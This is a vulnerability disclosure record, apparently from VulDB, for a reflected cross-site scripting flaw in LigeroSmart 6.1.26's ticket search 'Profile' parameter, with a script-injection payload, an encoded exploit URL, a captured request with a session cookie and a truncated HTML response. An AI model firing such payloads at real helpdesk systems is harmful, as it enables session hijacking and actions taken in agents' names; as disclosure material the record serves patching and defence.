| Название | LigeroSmart 6.1.26 Cross-Site Scripting (XSS) - Reflected XSS |
|---|
| Описание | A reflected Cross-Site Scripting (XSS) vulnerability was identified in LigeroSmart version 6.1.26 .
Docker was installed and tests were performed.
https://github.com/LigeroSmart/docker-ligerosmart
The issue occurs due to insufficient input sanitization of the Profile parameter in the AgentTicketSearch functionality.
An authenticated attacker can inject arbitrary JavaScript code, which is reflected back to the user’s browser and executed in the context of the application. This may allow session hijacking, credential theft, unauthorized actions on behalf of authenticated users, and other client-side attacks.
Affected Endpoint: /otrs/index.pl
Vulnerable Parameters: Profile=<user-controlled input>
Proof of Concept (PoC): </script><script>alert(7777)</script>
URL-Encoded Payload: http://localhost:9090/otrs/index.pl?Action=AgentTicketSearch;Subaction=Search;TakeLastSearch=1;SaveProfile=1;Profile=1%3C%2Fscript%3E%3Cscript%3Ealert%287777%29%3C%2Fscript%3E
When the crafted URL is accessed by an authenticated agent user, the injected JavaScript payload is executed in the browser, displaying an alert dialog (alert(7777)), confirming the reflected XSS vulnerability.
REQUEST
GET /otrs/index.pl?Action=AgentTicketSearch;Subaction=Search;TakeLastSearch=1;SaveProfile=1;Profile=1%3C%2Fscript%3E%3Cscript%3Ealert%287777%29%3C%2Fscript%3E HTTP/1.1
Host: localhost:9090
Cache-Control: max-age=0
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate, br
Cookie: OTRSAgentInterface=mGvYIUIyihthTyFtxMhNihGuC3BGLRnw
Connection: keep-alive
RESPONSE
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Disposition: filename="AgentTicketSearch.html"
Content-Type: text/html; charset=utf-8;
Date: Sat, 31 Jan 2026 12:32:51 GMT
Expires: Tue, 1 Jan 1980 12:00:00 GMT
Pragma: no-cache
Server: nginx
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=edge,chrome=1
Content-Length: 51479
<!DOCTYPE html>
<html>
<!-- -->
<!-- OTRS: Copyright (C) 2001-2020 OTRS AG, https://otrs.com/. -->
<!-- Web: https://otrs.com/ - Lists: https://lists.otrs.org/ -->
<!-- GNU General Public License: https://www.gnu.org/licenses/gpl-3.0.txt -->
<!-- -->
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8" />
<meta id="viewport" name="viewport" content="">
<meta name="robots" content="noindex,nofollow" />
<script>
(function(doc, win) {
var viewport = doc.getElementById('viewport'),
isIFrame = (win.top.location.href !== win.location.href),
isPopup = (win.name.search(/^OTRSPopup_/) != -1);
try {
if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) {
viewport.setAttribute("content", "width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no");
}
}
catch (Exception) {}
}(document, window));
</script>
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Ticket#)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionTicketNumber" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Texto Completo)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionFulltext" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ#)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFAQNumber" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ-TextoCompleto)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFulltext" />
<link rel="shortcut icon" href="/otrs-web/skins/Agent/ligero/img/icons/product.ico" type="image/ico" />
<link rel="apple-touch-icon" href="/otrs-web/skins/Agent/ligero/img/icons/apple-touch-icon.png" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/CommonCSS_58d99bf049eab644adf1f2f6d94d8555.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/ligero/css-cache/CommonCSS_9ccfdcfb580d3c1055590bb9f234fef7.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/ModuleCSS_32ff7fb570c153262e7a390c9d7f8324.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css/thirdparty/ui-theme/jquery-ui.css" />
<style type="text/css">
#Header #Logo {
background-image: url(/otrs-web/skins/Agent/default/img/logo_bg.png);
top: 7px;
right: 24px;
width: 300px;
height: 55px;
}
</style>
<link rel="stylesheet" type="text/css" href="/otrs-web/common/css/font-awesome.min.css" />
<script>
(function(doc, win) {
var isIFrame = (win.top.location.href !== win.location.href),
isPopup = (win.name.search(/^OTRSPopup_/) != -1);
try {
if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) {
var ResponsiveCSS;
ResponsiveCSS = doc.createElement("link");
ResponsiveCSS.setAttribute("rel", "stylesheet");
ResponsiveCSS.setAttribute("type", "text/css");
ResponsiveCSS.setAttribute("href", "/otrs-web/skins/Agent/default/css-cache/ResponsiveCSS_342832cd0dfa4f871e6b8d41435252e0.css");
doc.getElementsByTagName("head")[0].appendChild(ResponsiveCSS);
}
}
catch (Exception) {}
}(document, window));
</script>
<title>Procurar - Chamado - LigeroSmart</title>
<script type="text/javascript">//<![CDATA[
"use strict";
var Core = Core || {};
Core.App = Core.App || {};
/**
* @function
* Ignores an event. Implemented without jQuery because no external JavaScript is available yet.
* @return nothing
*/
function IgnoreEvent (Event) {
if (Event.preventDefault) {
Event.preventDefault();
}
Event.returnValue = false;
return false;
}
/**
* @function
* This function blocks all click events on the page until it is
* unblocked after all JavaScript was loaded. Implemented without
* jQuery because no external JavaScript is available yet.
* @return nothing
*/
Core.App.BlockEvents = function() {
if (document.addEventListener) {
document.addEventListener('click', IgnoreEvent, false);
}
else {
document.attachEvent('onclick', IgnoreEvent);
}
};
/**
* @function
* This function unblocks all click events on the page
* after all JavaScript was loaded. Implemented without
* jQuery because no external JavaScript is available yet.
* @return nothing
*/
Core.App.UnblockEvents = function() {
if (document.removeEventListener) {
document.removeEventListener('click', IgnoreEvent, false);
}
else {
document.detachEvent('onclick', IgnoreEvent);
}
// allow tests to wait for complete page load
Core.App.PageLoadComplete = true;
};
// Now block all click events on the page to make sure that
// an agent does not click before all JavaScript was loaded,
// as event listeners are not yet available, for example.
Core.App.BlockEvents();
//]]></script>
</head>
<body class="">
<a name="Top"></a>
<div id="AppWrapper">
<div id="Header" class="ARIARoleBanner">
<div id="Logo"></div>
<ul id="ToolBar">
<li class="UserAvatar">
<a href="#">
<img src="//www.gravatar.com/avatar/b1a4b2518dbbdd47dd4a713d5cd1df94?s=100&d=mp" />
</a>
<div>
<span>Admin LigeroSmart</span>
<a href="/otrs/index.pl?Action=AgentPreferences" title="Editar preferências pessoais">
<i class="fa fa-cog"></i><strong>Preferências Pessoais</strong>
</a>
<a class="LogoutButton" id="LogoutButton" href="/otrs/index.pl?Action=Logout;ChallengeToken=UFfwuDve1AuIS2ehbEmyWw4pZ2qVcCeE;" title="Sair (Você está logado como Admin LigeroSmart)">
<i class="fa fa-power-off"></i><strong>Sair</strong>
</a>
</div>
</li>
<li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueue" target="" accesskey="q" title="Visão de Filas: (q)">Visão de Filas <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-folder"></i> <span class="Counter"></span> </a></li>
<li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueueKanban" target="" accesskey="q" title="Kanban view: (q)">Kanban view <i class="ic |
|---|
| Источник | ⚠️ https://github.com/LigeroSmart/ligerosmart/issues/282 |
|---|
| Пользователь | Samara Gama - igobysamy (UID 81801) |
|---|
| Представление | 31.01.2026 14:08 (3 месяцы назад) |
|---|
| Модерация | 15.02.2026 17:00 (15 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 346154 [LigeroSmart до 6.1.26 index.pl?Action=AgentTicketSearch Профиль межсайтовый скриптинг] |
|---|
| Баллы | 20 |
|---|